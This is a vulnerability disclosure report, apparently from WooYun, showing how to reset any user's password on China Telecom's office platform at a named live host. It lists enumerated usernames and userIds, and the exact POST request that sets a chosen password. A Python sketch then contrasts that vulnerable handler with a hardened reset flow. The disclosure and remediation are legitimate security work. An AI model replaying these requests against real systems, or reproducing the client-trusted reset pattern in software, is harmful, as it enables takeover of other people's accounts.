Reset the password of any account on China Telecom Integrated Office Platform
Affected system: http://office.189.cn/ (office automation platform V3.0.0)
Password retrieval page: http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!input.do
The login account field of the password retrieval page can be used to enumerate valid user names. Several accounts are listed here:
cuichundandonggaoguanhuajuanleililinqiruitaoyangzhangzhenzhengalaoaminane
Take tao as an example. The retrieval flow sends a verification code to the mobile phone on file; the code is only four digits, so it can be brute-forced.
That is the first issue. Now look at the password change request:
POST /ioop-bcs-web/sys/sys-pwd-question!check.do HTTP/1.1
Host: office.189.cn
Proxy-Connection: keep-alive
Content-Length: 87
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://office.189.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: [cookie value not preserved on the page]

userId=ff808081452c2fcc0147246ebabf1d20&step=4&password=wooyuntest&password2=wooyuntest
At a glance there is no token: the request carries nothing but a client-supplied userId and step, so as long as we obtain a userId we can reset that account's password.
As for obtaining it, go back a few steps: entering a login account on the password retrieval page returns the userId corresponding to that account.
For example, retrieve the Account "yang" and get the userId: 402835d03f2446d6013f4039d6ae4491.
Construct the following POST:
POST http://office.189.cn/ioop-bcs-web/sys/sys-pwd-question!check.do
userId=402835d03f2446d6013f4039d6ae4491&step=4&password=wooyuntest&password2=wooyuntest
Result: yang / wooyuntest
Testing showed that admin is a system administrator account. To avoid causing problems, no operations were performed on it; otherwise higher privileges would have been obtained.
Solution:
Filter
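The two defects the report describes are that the server trusts a client-supplied userId and step value, and that identity is established by a four-digit code that can be guessed. The following Python sketch, added here as an illustration and not code from the platform or the report, puts a handler shaped like the vulnerable one beside a hardened version: the hardened flow keeps the verified identity in server-side state, issues a random single-use token only after the code check succeeds, locks the session after a few wrong codes, and never returns the userId to the client. The user store, session store and function names are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

# Constructed user store for the example; ids mirror the format seen in the report.
USERS = {
    "402835d03f2446d6013f4039d6ae4491": {"name": "yang", "password": "old-yang"},
    "ff808081452c2fcc0147246ebabf1d20": {"name": "tao", "password": "old-tao"},
}


def vulnerable_check(form):
    """Same pattern as the report's check.do: userId and step come from the
    client and are trusted, so anyone who knows a userId can set its password."""
    if form.get("step") != "4":
        return "wrong step"
    if form.get("password") != form.get("password2"):
        return "mismatch"
    user = USERS.get(form.get("userId"))
    if user is None:
        return "no such user"
    user["password"] = form["password"]
    return "ok"


# ---- hardened flow: identity lives on the server, not in the form ----
MAX_ATTEMPTS = 5


@dataclass
class ResetSession:
    user_id: Optional[str]      # None when the account does not exist
    code: str                   # six-digit OTP generated server side
    attempts: int = 0
    verified: bool = False
    token: Optional[str] = None  # issued only after the code check succeeds


SESSIONS = {}  # opaque session id -> ResetSession (server-side state)


def start_reset(account_name):
    """Begin a reset. Always returns an opaque session id, whether or not the
    account exists, so the response cannot be used to enumerate users.
    The code is returned here only so the example is self-contained; a real
    system delivers it to the phone on file and never to the requester."""
    user_id = next((uid for uid, u in USERS.items() if u["name"] == account_name), None)
    sid = secrets.token_urlsafe(16)
    code = f"{secrets.randbelow(10**6):06d}"
    SESSIONS[sid] = ResetSession(user_id=user_id, code=code)
    return sid, code


def verify_code(sid, submitted):
    """Check the OTP with a bounded number of attempts; return a single-use
    token on success. Unknown accounts fail exactly like wrong codes."""
    s = SESSIONS.get(sid)
    if s is None:
        return "invalid session"
    if s.attempts >= MAX_ATTEMPTS:
        return "locked"
    s.attempts += 1
    if s.user_id is None or not hmac.compare_digest(s.code, submitted):
        return "wrong code"
    s.verified = True
    s.token = secrets.token_urlsafe(32)
    return s.token


def hardened_check(sid, form):
    """Reset the password for the identity bound to the session. No userId or
    step is read from the form; the token proves the code check happened."""
    s = SESSIONS.get(sid)
    if s is None or not s.verified:
        return "not verified"
    if not hmac.compare_digest(s.token, form.get("token", "")):
        return "bad token"
    if form.get("password") != form.get("password2"):
        return "mismatch"
    USERS[s.user_id]["password"] = form["password"]
    del SESSIONS[sid]  # single use: the token cannot be replayed
    return "ok"


if __name__ == "__main__":
    print(vulnerable_check({"userId": "402835d03f2446d6013f4039d6ae4491",
                            "step": "4", "password": "x", "password2": "x"}))
    sid, code = start_reset("tao")
    print(hardened_check(sid, {"password": "y", "password2": "y", "token": ""}))
    tok = verify_code(sid, code)
    print(hardened_check(sid, {"password": "y", "password2": "y", "token": tok}))
```

The point of the hardened version is that nothing the client sends selects the account: the account was fixed when the session was created, the code check is the only way to mark it verified, and the token plus the lockout counter close the paths the report used. A six-digit code with five attempts is shown for illustration; the exact length and limit are a policy choice.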